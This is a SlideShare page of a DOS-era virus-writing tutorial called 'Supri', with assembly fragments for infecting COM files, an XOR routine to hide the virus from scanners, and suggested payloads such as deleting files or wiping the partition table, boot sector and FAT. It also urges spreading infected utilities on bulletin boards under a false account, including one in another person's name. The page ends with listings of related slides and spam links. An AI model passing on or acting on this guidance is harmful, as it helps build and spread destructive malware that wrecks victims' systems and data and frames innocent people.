SlideShare a Scribd company logo

Assembly Language Coded Virus Supri (supreme v1)

Download as PPTX, PDF
Bipul Chandra Kar
Bipul Chandra Kar

This document provides instructions for creating computer viruses. It describes the key components of a virus, including the replicator, concealer, and bomb. The replicator spreads the virus by copying itself without destroying files. The concealer uses encryption to avoid detection. The bomb carries out harmful actions like deleting files or slowing the system down. It encourages testing viruses and distributing them on bulletin boards to infect as many systems as possible. The goal is to eliminate "fools" who are unable to detect a virus infection.

Engineering
1 of 18
SUPRI (SUPREME V1) Assembly Language Virus
VIRUS ARE WONDROUS CREATIONS WRITTEN FOR THE SOLE PURPOSE OF SPREADING AND DESTROYING THE SYSTEMS OF UNSUSPECTING FOOLS. THIS ELIMINATES THE SYSTEMS OF SIMPLETONS WHO CAN'T TELL THAT THERE IS A PROBLEM WHEN A 100 BYTE FILE SUDDENLY BLOSSOMS INTO A 1,000 BYTE FILE. DUH. THESE LOW-LIFES DO NOT DESERVE TO EXIST, SO IT IS OUR SACRED DUTY TO WIPE THEIR HARD DRIVES OFF THE FACE OF THE EARTH. IT IS A SIMPLE MATTER OF SPEEDING ALONG SURVIVAL OF THE FITTEST
THERE ARE THREE TYPES OF VIRUS: 1) TINY VIRUS (UNDER 500 BYTES) WHICH ARE DESIGNED TO BE UNDETECTABLE DUE TO THEIR SMALL SIZE. TINY IS ONE SUCH VIRUS. THEY ARE GENERALLY VERY SIMPLE BECAUSE THEIR CODE LENGTH IS SO LIMITED. 2) LARGE VIRUS (OVER 1,500 BYTES) WHICH ARE DESIGNED TO BE UNDETECTABLE BECAUSE THEY COVER THEIR TRACKS VERY WELL (ALL THAT CODE DOES HAVE A USE!). THE BEST EXAMPLE OF THIS IS THE WHALE VIRUS, WHICH IS PERHAPS THE BEST 'STEALTH' VIRUS IN EXISTENCE. 3) OTHER VIRUS WHICH ARE NOT DESIGNED TO BE HIDDEN AT ALL (THE WRITERS DON'T GIVE A SHIT). THE COMMON VIRUS IS LIKE THIS. ALL OVERWRITING VIRUS ARE IN THIS CATEGORY.
PART OF VIRUS A VIRUS MAY BE DIVIDED INTO THREE PARTS: THE REPLICATOR, THE CONCEALER, AND THE BOMB. THE REPLICATOR PART CONTROLS THE SPREAD OF THE VIRUS TO OTHER FILES, THE CONCEALER KEEPS THE VIRUS FROM BEING DETECTED, AND THE BOMB ONLY EXECUTES WHEN THE ACTIVATION CONDITIONS OF THE VIRUS (MORE ON THAT LATER) ARE SATISFIED.
THE REPLICATOR THE JOB OF THE REPLICATOR IS TO SPREAD THE VIRUS THROUGHOUT THE SYSTEM OF THE CLOD WHO HAS CAUGHT THE VIRUS. HOW DOES IT DO THIS WITHOUT DESTROYING THE FILE IT INFECTS? THE EASIEST TYPE OF REPLICATOR INFECTS COM FILES. IT FIRST SAVES THE FIRST FEW BYTES OF THE INFECTED FILE. IT THEN COPIES A SMALL PORTION OF ITS CODE TO THE BEGINNING OF THE FILE, AND THE REST TO THE END. THE UNINFECTED FILE THE VIRUS CODE IN THE DIAGRAM, P1 IS PART 1 OF THE FILE, P2 IS PART 2 OF THE FILE, AND V1 AND V2 ARE PARTS 1 AND 2 OF THE VIRUS. NOTE THAT THE SIZE OF P1 SHOULD BE THE SAME AS THE SIZE OF V1, BUT THE SIZE OF P2 DOESN'T NECESSARILY HAVE TO BE THE SAME SIZE AS V2. THE VIRUS FIRST SAVES P1 AND COPIES IT TO THE EITHER 1) THE END OF THE FILE OR 2) INSIDE THE CODE OF THE VIRUS. LET'S ASSUME IT COPIES THE CODE TO THE END OF THE FILE. THE FILE NOW LOOKS LIKE: | P1 | P2 | | V1 | V2 | | P1 | P2 | P1 |
THEN, THE VIRUS COPIES THE FIRST PART OF ITSELF TO THE BEGINNING OF THE FILE. FINALLY, THE VIRUS COPIES THE SECOND PART OF ITSELF TO THE END OF THE FILE. THE FINAL, INFECTED FILE LOOKS LIKE THIS: THE QUESTION IS: WHAT THE THING DO V1 AND V2 DO? V1 TRANSFERS CONTROL OF THE PROGRAM TO V2. THE CODE TO DO THIS IS SIMPLE. | V1 | P2 | P1 | | V1 | P2 | P1 | V2|
JMP FAR PTR DUH ; TAKES FOUR BYTES DUH DW V2_START ; TAKES TWO BYTES DUH IS A FAR POINTER (SEGMENT:OFFSET) POINTING TO THE FIRST INSTRUCTION OF V2. NOTE THAT THE VALUE OF DUH MUST BE CHANGED TO REFLECT THE LENGTH OF THE FILE THAT IS INFECTED. FOR EXAMPLE, IF THE ORIGINAL SIZE OF THE PROGRAM IS 79 BYTES, DUH MUST BE CHANGED SO THAT THE INSTRUCTION AT CS:[155H] IS EXECUTED. THE VALUE OF DUH IS OBTAINED BY ADDING THE LENGTH OF V1, THE ORIGINAL SIZE OF THE INFECTED FILE, AND 256 (TO ACCOUNT FOR THE PSP). IN THIS CASE, V1 = 6 AND P1 + P2 = 79, SO 6 + 79 + 256 = 341 DECIMAL (155 HEX).
V2 CONTAINS THE REST OF THE CODE, I.E. THE STUFF THAT DOES EVERYTHING ELSE. THE LAST PART OF V2 COPIES P1 OVER V1 (IN MEMORY, NOT ON DISK) AND THEN TRANSFERS CONTROL TO THE BEGINNING OF THE FILE (IN MEMORY). THE ORIGINAL PROGRAM WILL THEN RUN HAPPILY AS IF NOTHING HAPPENED. THE CODE TO DO THIS IS ALSO VERY SIMPLE. MOV SI, V2_START ; V2_START IS A LABEL MARKING WHERE V2 STARTS SUB SI, V1_LENGTH ; GO BACK TO WHERE P1 IS STORED MOV DI, 0100H ; ALL COM FILES ARE LOADED @ CS:[100H] IN MEMORY MOV CX, V1_LENGTH ; MOVE CX BYTES REP MOVSB ; DS:[SI] -> ES:[DI] MOV DI, 0100H JMP DI
THIS CODE ASSUMES THAT P1 IS LOCATED JUST BEFORE V2, AS IN: P1_STORED_HERE: . . . V2_START: IT ALSO ASSUMES ES EQUALS CS. IF THESE ASSUMPTIONS ARE FALSE, CHANGE THE CODE ACCORDINGLY. HERE IS AN EXAMPLE: PUSH CS ; STORE CS POP ES ; AND MOVE IT TO ES ; NOTE MOV ES, CS IS NOT A VALID INSTRUCTION MOV SI, P1_START ; MOVE FROM WHERE EVER P1 IS STORED MOV DI, 0100H ; TO CS:[100H] MOV CX, V1_LENGTH REP MOVSB MOV DI, 0100H JMP DI
V1_START: JMP FAR PTR DUH DUH DW V2_START V1_END: P2_START: P2_END: P1_START: ; FIRST PART OF THE PROGRAM STORED HERE FOR FUTURE USE P1_END: V2_START: ; REAL STUFF V2_END: V1_LENGTH EQU V1_END - V1_START THAT'S ALL THERE IS TO INFECTING A COM FILE WITHOUT DESTROYING IT!
CONCEALER THIS IS THE PART WHICH CONCEALS THE PROGRAM FROM NOTICE BY THE EVERYDAY USER AND VIRUS SCANNER. THE SIMPLEST FORM OF CONCEALMENT IS THE ENCRYPTOR. THE CODE FOR A SIMPLE XOR ENCRYPTION SYSTEM FOLLOWS: ENCRYPT_VAL DB ? DECRYPT: ENCRYPT: MOV AH, ENCRYPT_VAL MOV CX, PART_TO_ENCRYPT_END - PART_TO_ENCRYPT_START MOV SI, PART_TO_ENCRYPT_START MOV DI, SI XOR_LOOP: LODSB ; DS:[SI] -> AL XOR AL, AH STOSB ; AL -> ES:[DI] LOOP XOR_LOOP RET
NOTE THE ENCRYPTION AND DECRYPTION PROCEDURES ARE THE SAME. THIS IS DUE TO THE WEIRD NATURE OF XOR. YOU CAN CALL THESE PROCEDURES FROM ANYWHERE IN THE PROGRAM, BUT MAKE SURE YOU DO NOT CALL IT FROM A PLACE WITHIN THE AREA TO BE ENCRYPTED, AS THE PROGRAM WILL CRASH. WHEN WRITING THE VIRUS, SET THE ENCRYPTION VALUE TO 0. PART_TO_ENCRYPT_START AND PART_TO_ENCRYPT_END SANDWICH THE AREA YOU WISH TO ENCRYPT. USE A CALL DECRYPT IN THE BEGINNING OF V2 TO UNENCRYPT THE FILE SO YOUR PROGRAM CAN RUN. WHEN INFECTING A FILE, FIRST CHANGE THE ENCRYPT_VAL, THEN CALL ENCRYPT, THEN WRITE V2 TO THE END OF THE FILE, AND CALL DECRYPT. MAKE SURE THIS PART DOES NOT LIE IN THE AREA TO BE ENCRYPTED!!!
THE BOMB SO NOW ALL THE BORING STUFF IS OVER. THE NASTINESS IS CONTAINED HERE. THE BOMB PART OF THE VIRUS DOES ALL THE DELETION/SLOWDOWN/ETC WHICH MAKE VIRII SO ANNOYING. SET SOME ACTIVATION CONDITIONS OF THE VIRUS. THIS CAN BE ANYTHING, RANGING FROM WHEN IT'S YOUR BIRTHDAY TO WHEN THE VIRUS HAS INFECTED 100 FILES. WHEN THESE CONDITIONS ARE MET, THEN YOUR VIRUS DOES THE GOOD STUFF. SOME SUGGESTIONS OF POSSIBLE BOMBS: 1) SYSTEM SLOWDOWN - EASILY HANDLED BY TRAPPING AN INTERRUPT AND CAUSING A DELAY WHEN IT ACTIVATES. 2) FILE DELETION - DELETE ALL ZIP FILES ON THE DRIVE. 3) MESSAGE DISPLAY - DISPLAY A NICE MESSAGE SAYING SOMETHING TO THE EFFECT OF "YOU ARE FUCKED." 4) KILLING/REPLACING THE PARTITION TABLE/BOOT SECTOR/FAT OF THE HARD DRIVE - THIS IS VERY NASTY, AS MOST DIMWITS CANNOT FIX THIS.
OFFSET PROBLEMS THERE IS ONE CAVEAT REGARDING CALCULATION OF OFFSETS. AFTER YOU INFECT A FILE, THE LOCATIONS OF VARIABLES CHANGE. YOU MUST ACCOUNT FOR THIS. ALL RELATIVE OFFSETS CAN STAY THE SAME, BUT YOU MUST ADD THE FILE SIZE TO THE ABSOLUTE OFFSETS OR YOUR PROGRAM WILL NOT WORK. THIS IS THE MOST TRICKY PART OF WRITING VIRUS AND TAKING THESE INTO ACCOUNT CAN OFTEN GREATLY INCREASE THE SIZE OF A VIRUS. THIS IS VERY IMPORTANT AND YOU SHOULD BE SURE TO UNDERSTAND THIS BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
TESTING TESTING VIRII IS A DANGEROUS YET ESSENTIAL PART OF THE VIRUS CREATION PROCESS. THIS IS TO MAKE CERTAIN THAT PEOPLE *WILL* BE HIT BY THE VIRUS AND, HOPEFULLY, WIPED OUT. TEST THOROUGHLY AND MAKE SURE IT ACTIVATES UNDER THE CONDITIONS. IT WOULD BE GREAT IF EVERYONE HAD A SECOND COMPUTER TO TEST THEIR VIRII OUT, BUT, OF COURSE, THIS IS NOT THE CASE. SO IT IS ESSENTIAL THAT YOU KEEP BACKUPS OF YOUR FILES, PARTITION, BOOT RECORD, AND FAT. NORTON IS HANDY IN THIS DOING THIS. DO NOT DISREGARD THIS ADVICE (EVEN THOUGH I KNOW THAT YOU WILL ANYWAY) BECAUSE YOU WILL BE HIT BY YOUR OWN VIRII. WHEN I WROTE MY FIRST VIRUS, MY SYSTEM WAS TAKEN DOWN FOR TWO DAYS BECAUSE I DIDN'T HAVE GOOD BACKUPS. LUCKILY, THE VIRUS WAS NOT OVERLY DESTRUCTIVE. BACKUPS MAKE SENSE! LEECH A BACKUP PROGRAM FROM YOUR LOCAL PIRATE BOARD! I FIND A RAMDRIVE IS OFTEN HELPFUL IN TESTING VIRII, AS THE DAMAGE IS NOT PERMANENT. RAMDRIVES ARE ALSO USEFUL FOR TESTING TROJANS, BUT THAT IS THE TOPIC OF ANOTHER FILE...
DISTRIBUTION THIS IS ANOTHER FUN PART OF VIRUS WRITING. IT INVOLVES SENDING YOUR BRILLIANTLY-WRITTEN PROGRAM THROUGH THE PHONE LINES TO YOUR LOCAL, UNSUSPECTING BULLETIN BOARDS. WHAT YOU SHOULD DO IS INFECT A FILE THAT ACTUALLY DOES SOMETHING (LEECH A USEFUL UTILITY FROM ANOTHER BOARD), INFECT IT, AND UPLOAD IT TO A PLACE WHERE IT WILL BE DOWNLOADED BY USERS ALL OVER. THE BEST THING IS THAT IT WON'T BE DETECTED BY PUNY SCANNER-WANNA-BES BY MCAFFEE, SINCE IT IS NEW! OH YEAH, MAKE SURE YOU ARE USING A FALSE ACCOUNT (DUH). BETTER YET, MAKE A FALSE ACCOUNT WITH THE NAME/PHONE NUMBER OF SOMEONE YOU DON'T LIKE AND UPLOAD THE INFECTED FILE UNDER THE HIS NAME. YOU CAN CALL BACK FROM TIME TO TIME AND USE A DOOR SUCH AS ZDOOR TO CHECK THE SPREAD OF THE VIRUS. THE MORE WHO DOWNLOAD, THE MORE WHO SHARE IN THE EXPERIENCE OF YOUR VIRUS!
THAT’S ALL THANK YOU TO ALL

Recommended

Microprocessors-based systems (under graduate course) Lecture 8 of 9
Microprocessors-based systems (under graduate course) Lecture 8 of 9 Microprocessors-based systems (under graduate course) Lecture 8 of 9
Microprocessors-based systems (under graduate course) Lecture 8 of 9 Randa Elanwar
 
Al2ed chapter10
Al2ed chapter10Al2ed chapter10
Al2ed chapter10Abdullelah Al-Fahad
 
Lecture5
Lecture5Lecture5
Lecture5misgina Mengesha
 
Assembly Language String Chapter
Assembly Language String Chapter Assembly Language String Chapter
Assembly Language String Chapter Atieq-ur -Rehman
 
Instruction set of 8085
Instruction set of 8085Instruction set of 8085
Instruction set of 8085shiji v r
 
Instruction set of 8086
Instruction set of 8086Instruction set of 8086
Instruction set of 80869840596838
 
Assembly language programming(unit 4)
Assembly language programming(unit 4)Assembly language programming(unit 4)
Assembly language programming(unit 4)Ashim Saha
 
2600 v09 n1 (spring 1992)
2600 v09 n1 (spring 1992)2600 v09 n1 (spring 1992)
2600 v09 n1 (spring 1992)Felipe Prado
 

Recommended

Microprocessors-based systems (under graduate course) Lecture 8 of 9
Microprocessors-based systems (under graduate course) Lecture 8 of 9 Microprocessors-based systems (under graduate course) Lecture 8 of 9
Microprocessors-based systems (under graduate course) Lecture 8 of 9 Randa Elanwar
 
Al2ed chapter10
Al2ed chapter10Al2ed chapter10
Al2ed chapter10Abdullelah Al-Fahad
 
Lecture5
Lecture5Lecture5
Lecture5misgina Mengesha
 
Assembly Language String Chapter
Assembly Language String Chapter Assembly Language String Chapter
Assembly Language String Chapter Atieq-ur -Rehman
 
Instruction set of 8085
Instruction set of 8085Instruction set of 8085
Instruction set of 8085shiji v r
 
Instruction set of 8086
Instruction set of 8086Instruction set of 8086
Instruction set of 80869840596838
 
Assembly language programming(unit 4)
Assembly language programming(unit 4)Assembly language programming(unit 4)
Assembly language programming(unit 4)Ashim Saha
 
2600 v09 n1 (spring 1992)
2600 v09 n1 (spring 1992)2600 v09 n1 (spring 1992)
2600 v09 n1 (spring 1992)Felipe Prado
 
Iloveyou virus
Iloveyou virusIloveyou virus
Iloveyou virusssuser1eca7d
 
2600 v02 n09 (september 1985)
2600 v02 n09 (september 1985)2600 v02 n09 (september 1985)
2600 v02 n09 (september 1985)Felipe Prado
 
2600 v04 n11 (november 1987)
2600 v04 n11 (november 1987)2600 v04 n11 (november 1987)
2600 v04 n11 (november 1987)Felipe Prado
 
Enabling and Supporting the Debugging of Software Failures (PhD Defense)
Enabling and Supporting the Debugging of Software Failures (PhD Defense)Enabling and Supporting the Debugging of Software Failures (PhD Defense)
Enabling and Supporting the Debugging of Software Failures (PhD Defense)James Clause
 
A N T I A V
A N T I A VA N T I A V
A N T I A VNgo Hung Long
 
Computer virus
Computer virusComputer virus
Computer virusSahib Sethi
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Adrian Sanabria
 
virus
virusvirus
virusVinod siragaon
 
radhika.pdf
radhika.pdfradhika.pdf
radhika.pdfdharmendra321361
 
Applying principles of chaos engineering to Serverless
Applying principles of chaos engineering to ServerlessApplying principles of chaos engineering to Serverless
Applying principles of chaos engineering to ServerlessYan Cui
 
Attack of the clones
Attack of the clonesAttack of the clones
Attack of the clonesUltraUploader
 
Am i doing deployments right v2
Am i doing deployments right v2Am i doing deployments right v2
Am i doing deployments right v2Matteo Emili
 
Computer Viruses
Computer VirusesComputer Viruses
Computer VirusesAman Chaudhary
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushedSandro Gauci
 
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
1. In OS, multiple jobs can run in parallel and finish faster than i.pdfgulshan16175gs
 
Computer virus presenatation
Computer virus presenatationComputer virus presenatation
Computer virus presenatationrarediamond_2012
 
Social impacts of it
Social impacts of it Social impacts of it
Social impacts of it Amit Jaglan
 
Cansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthCansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthThierry Zoller
 
Computer Security
Computer SecurityComputer Security
Computer SecurityWilliam Mann
 
2600 v03 n08 (august 1986)
2600 v03 n08 (august 1986)2600 v03 n08 (august 1986)
2600 v03 n08 (august 1986)Felipe Prado
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escortsranjana rawat
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINESIVASHANKAR N
 

More Related Content

Similar to Assembly Language Coded Virus Supri (supreme v1)

2600 v02 n09 (september 1985)
2600 v02 n09 (september 1985)2600 v02 n09 (september 1985)
2600 v02 n09 (september 1985)Felipe Prado
 
2600 v04 n11 (november 1987)
2600 v04 n11 (november 1987)2600 v04 n11 (november 1987)
2600 v04 n11 (november 1987)Felipe Prado
 
Enabling and Supporting the Debugging of Software Failures (PhD Defense)
Enabling and Supporting the Debugging of Software Failures (PhD Defense)Enabling and Supporting the Debugging of Software Failures (PhD Defense)
Enabling and Supporting the Debugging of Software Failures (PhD Defense)James Clause
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Adrian Sanabria
 
Applying principles of chaos engineering to Serverless
Applying principles of chaos engineering to ServerlessApplying principles of chaos engineering to Serverless
Applying principles of chaos engineering to ServerlessYan Cui
 
Attack of the clones
Attack of the clonesAttack of the clones
Attack of the clonesUltraUploader
 
Am i doing deployments right v2
Am i doing deployments right v2Am i doing deployments right v2
Am i doing deployments right v2Matteo Emili
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushedSandro Gauci
 
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
1. In OS, multiple jobs can run in parallel and finish faster than i.pdfgulshan16175gs
 
Computer virus presenatation
Computer virus presenatationComputer virus presenatation
Computer virus presenatationrarediamond_2012
 
Social impacts of it
Social impacts of it Social impacts of it
Social impacts of it Amit Jaglan
 
Cansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthCansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthThierry Zoller
 
2600 v03 n08 (august 1986)
2600 v03 n08 (august 1986)2600 v03 n08 (august 1986)
2600 v03 n08 (august 1986)Felipe Prado
 

Similar to Assembly Language Coded Virus Supri (supreme v1) (20)

Iloveyou virus
Iloveyou virusIloveyou virus
Iloveyou virus
 
2600 v02 n09 (september 1985)
2600 v02 n09 (september 1985)2600 v02 n09 (september 1985)
2600 v02 n09 (september 1985)
 
2600 v04 n11 (november 1987)
2600 v04 n11 (november 1987)2600 v04 n11 (november 1987)
2600 v04 n11 (november 1987)
 
Enabling and Supporting the Debugging of Software Failures (PhD Defense)
Enabling and Supporting the Debugging of Software Failures (PhD Defense)Enabling and Supporting the Debugging of Software Failures (PhD Defense)
Enabling and Supporting the Debugging of Software Failures (PhD Defense)
 
A N T I A V
A N T I A VA N T I A V
A N T I A V
 
Computer virus
Computer virusComputer virus
Computer virus
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
 
virus
virusvirus
virus
 
radhika.pdf
radhika.pdfradhika.pdf
radhika.pdf
 
Applying principles of chaos engineering to Serverless
Applying principles of chaos engineering to ServerlessApplying principles of chaos engineering to Serverless
Applying principles of chaos engineering to Serverless
 
Attack of the clones
Attack of the clonesAttack of the clones
Attack of the clones
 
Am i doing deployments right v2
Am i doing deployments right v2Am i doing deployments right v2
Am i doing deployments right v2
 
Computer Viruses
Computer VirusesComputer Viruses
Computer Viruses
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushed
 
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
1. In OS, multiple jobs can run in parallel and finish faster than i.pdf
 
Computer virus presenatation
Computer virus presenatationComputer virus presenatation
Computer virus presenatation
 
Social impacts of it
Social impacts of it Social impacts of it
Social impacts of it
 
Cansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthCansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depth
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
2600 v03 n08 (august 1986)
2600 v03 n08 (august 1986)2600 v03 n08 (august 1986)
2600 v03 n08 (august 1986)
 

Recently uploaded

High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escortsranjana rawat
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINESIVASHANKAR N
 
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur EscortsCall Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...Christo Ananth
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordAsst.prof M.Gokilavani
 
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...ranjana rawat
 
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escortsranjana rawat
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)simmis5
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Dr.Costas Sachpazis
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Christo Ananth
 
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Suman Mia
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Call Girls in Nagpur High Profile
 
Porous Ceramics seminar and technical writing
Porous Ceramics seminar and technical writingPorous Ceramics seminar and technical writing
Porous Ceramics seminar and technical writingrakeshbaidya232001
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 

Recently uploaded (20)

High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
 
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur EscortsCall Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
 
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINEDJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
 
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
Call for Papers - Educational Administration: Theory and Practice, E-ISSN: 21...
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
 
Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024
 
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
